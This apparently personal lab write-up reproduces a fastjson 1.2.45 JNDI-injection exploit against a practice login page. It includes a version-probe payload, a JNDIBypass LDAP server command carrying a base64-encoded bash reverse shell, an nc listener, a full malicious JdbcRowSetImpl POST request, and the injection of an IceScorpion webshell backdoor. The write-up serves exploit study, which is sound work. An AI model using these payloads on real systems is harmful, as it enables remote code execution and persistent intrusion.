Exploit#
Reference: https://github.com/lemono0/FastJsonParty/blob/main/1247-waf-c3p0/write-up.md
Focus on reproducing a process to understand the exploit flow. There are many excellent articles by experts online, but they are not sufficient for foundational learning (especially regarding compiling Java files with IDEA, how to resolve dependency issues, etc., -__-|). Therefore, I will document my own reproduction process.
Capture the login request, as shown below:
Error method to understand the version
{
"@type": "java.lang.AutoCloseable"
The fastjson version is 1.2.45
According to the author's description, it is necessary to bypass the high version of JDK, so I used the author's JNDIBypass.jar tool.
Start the LDAP service using the JNDIBypass.jar file
java -jar .\JNDIBypass.jar -a 192.168.80.53 -p 1389 -c "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC44MC41My8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}"
nc listening
Send the package
POST /login HTTP/1.1
Host: 192.168.80.53
Content-Length: 262
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.80.53
Referer: http://192.168.80.53/tologin
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.80.53:1389/jpiuw",
"autoCommit":true
}
}
Return shell
java -jar .\JNDIBypass.jar -h
Injecting IceScorpion backdoor
Connect
